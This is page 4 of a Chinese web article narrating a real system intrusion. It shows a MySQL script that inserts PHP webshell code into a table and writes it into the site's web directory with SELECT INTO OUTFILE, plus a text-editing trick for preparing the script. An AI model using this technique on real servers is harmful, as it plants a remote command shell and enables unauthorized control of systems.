相关文章  
  • 严守秘密的科学方法-密码学初探
  • 黑客探密——网络安全的侦测与工具
  • 黑客Web欺骗的工作原理和解决方案
  • 观点与分析:网络毒刺与主动之路
  • 全程攻击无线网络WEP加密(一)
  • 全程攻击无线网络WEP加密(二)
  • 安全研究剖析:黑客入侵方式演示
  • 断网之后:基础网络安全不容忽视
  • 今天你泄露了吗 网络个人隐私渗透实例
  • 利用多种方法共保家庭网络安全
  •   推荐  
      科普之友首页   专利     科普      动物      植物        天文   考古   前沿科技
     您现在的位置在:  首页 >>文献 >>培训

    一次系统艰难而真实的入侵4

    行php.sql里的SQL语句,php.sql的代码:
      
      use test;
      
      create table tmp(cmd TEXT);
      
      insert into tmp values(\phpshell每行的代码\)
      
      insert into tmp values(\phpshell每行的代码\)
      
      insert into tmp values(\phpshell每行的代码\)
      
      ……
      
      select * from tmp into outfile \D:\\\\wangzhan\\\\wangzhan\\\\cmd2.php\;
      
      drop table tmp;
      
      意思跟上面说的差不多,也是一行一行的输入代码(由于PHP要换行的原因,所以要一行一行输),接着导出,最后删除,只是我编辑php.sql时候用了些小技巧,如果在每行PHPSHELL代码前都添加
      
      insert into tmp values(\和末尾都添加\)
      
      的话,工程量是可想而知的,所以我就用了一个特殊文本编辑器—易优超级字典生成器注册版,
      
      它有一个小功能,在修改字典里,有两个选项,一个是“在每个密码前插入字符串”另一个是
      
      “在每个密码后插入字符串”嘿嘿,聪明的读者应该想到了吧,先把phpshell.php改为phpshell.txt,接着用它编辑,勾选那两个选项,然后分别写上
      
      insert into tmp values(\,(由于一次不能写这么多,所以我就写 tmp values,输出好后,再插入insert into)和

    页码:[1] [2] [3] [4] [5] [6] [7]4页、共7页

         

          设为首页       |       加入收藏       |       广告服务       |       友情链接       |       版权申明      

    Copyriht 2007 - 2008 ©  科普之友 All right reserved